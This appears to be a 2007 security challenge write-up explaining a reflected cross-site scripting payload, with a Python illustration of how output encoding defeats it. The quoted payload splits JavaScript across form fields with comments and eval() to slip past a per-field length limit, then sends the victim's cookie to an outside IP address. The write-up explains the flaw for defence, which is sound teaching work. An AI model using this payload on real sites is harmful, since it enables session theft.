Tue, 24 Jul 2007

QoW 1 answered; QoW 2 released

A little while back we published our first public QoW for your abuse and enjoyment, and the time to close it is .......... now. The new QoW is available here. Thanks for the efforts; we received a fair number of answers and are still figuring out how to go about recording your submissions. For now, we'll publish the first correct answer and discuss it in brief. Over to Haroon:

Jeremiah Grossman sent in the first correct answer, with valiant attempts from many others. Acceptable solutions used either JavaScript or HTML comments to let the injection span multiple lines (or really, really small URLs :>).

An additional bonus for the attacker was that the form accepted as many name/value pairs as were submitted and returned them all in the table, so variables could be added indefinitely.

The original solution was therefore to submit:

http://qow.sensepost.com/cgi-bin/qow1/qow1?
name=<script>a='"http://'/*
&
address1=*/b='168.210.134.1/'/*
&
address3=*/c='?"+document'/*
&
moo1=*/d='.cookie'/*
&
moo2=*/f='document.location='/*
&
moo3=*/eval(f+a+b+c+d)/*
&
moo4=*/</script>

Effectively, we build our JS command in pieces so that each piece fits within the imposed character limit, and finally use eval() to pull them all together.

In our example we use it for a simple document.location to send the cookie off-site, but at that point the world is your oyster.
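The following is an added illustration, not SensePost's code or the challenge CGI: it reflects the submitted pairs quoted above into a table the way the post describes, shows what the browser's HTML parser then hands to the JS engine (the table markup ends up inside the JS comments, and a comment containing a newline acts as a line terminator, which is why the fragments join into valid statements), and contrasts that with the same table after output encoding. The per-field limit of 30 and the exact table layout are assumptions; the post gives neither.

```python
import html
import re

# Constructed sample input: the name/value pairs from the winning submission
# quoted in the post (the same fragments, nothing added).
SUBMITTED_FIELDS = [
    ("name",     "<script>a='\"http://'/*"),
    ("address1", "*/b='168.210.134.1/'/*"),
    ("address3", "*/c='?\"+document'/*"),
    ("moo1",     "*/d='.cookie'/*"),
    ("moo2",     "*/f='document.location='/*"),
    ("moo3",     "*/eval(f+a+b+c+d)/*"),
    ("moo4",     "*/</script>"),
]

# Assumed per-field length limit; the post mentions a limit but not its value.
FIELD_MAX = 30


def render_table_unsafe(fields, max_len=FIELD_MAX):
    """Reflect each pair into a table row, enforcing only a length cap per value.
    This stands in for the challenge CGI's behaviour as the post describes it."""
    rows = ["<tr><td>%s</td><td>%s</td></tr>" % (name, value[:max_len])
            for name, value in fields]
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def render_table_safe(fields, max_len=FIELD_MAX):
    """Same layout, but every reflected string is entity-encoded for an HTML
    text context, so <, >, &, double and single quotes can no longer open a
    tag or attribute."""
    rows = ["<tr><td>%s</td><td>%s</td></tr>"
            % (html.escape(name), html.escape(value[:max_len]))
            for name, value in fields]
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def inline_script_bodies(document):
    """Return what an HTML parser hands to the JS engine: everything from a
    <script> start tag up to the next </script>, table markup included."""
    return re.findall(r"<script>(.*?)</script>", document, flags=re.S | re.I)


def js_comments_to_terminators(src):
    """Strip /* ... */ comments the way a JS tokenizer does: a comment that
    contains a newline counts as a line terminator (so automatic semicolon
    insertion separates the statements); any other comment vanishes."""
    return re.sub(r"/\*.*?\*/",
                  lambda m: "\n" if "\n" in m.group(0) else "",
                  src, flags=re.S)


def assembled_script(fields):
    """The single script the browser would run after the unsafe reflection:
    the comment-bridged fragments with the swallowed markup removed."""
    bodies = inline_script_bodies(render_table_unsafe(fields))
    return js_comments_to_terminators(bodies[0]) if bodies else ""


if __name__ == "__main__":
    print("Browser sees this script after unsafe reflection:")
    print(assembled_script(SUBMITTED_FIELDS))
    print("Longest single field:", max(len(v) for _, v in SUBMITTED_FIELDS))
    print("Script elements after encoding:",
          len(inline_script_bodies(render_table_safe(SUBMITTED_FIELDS))))
```

The point for anyone building the form side: the length check holds for every individual field, yet the script the browser assembles is three times longer than the limit, because the limit constrains fragments rather than the HTML context they land in. Entity-encoding each reflected value for the text context it is written into leaves no script element at all, regardless of how many pairs are submitted.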

Ah well.. on with the show.. :>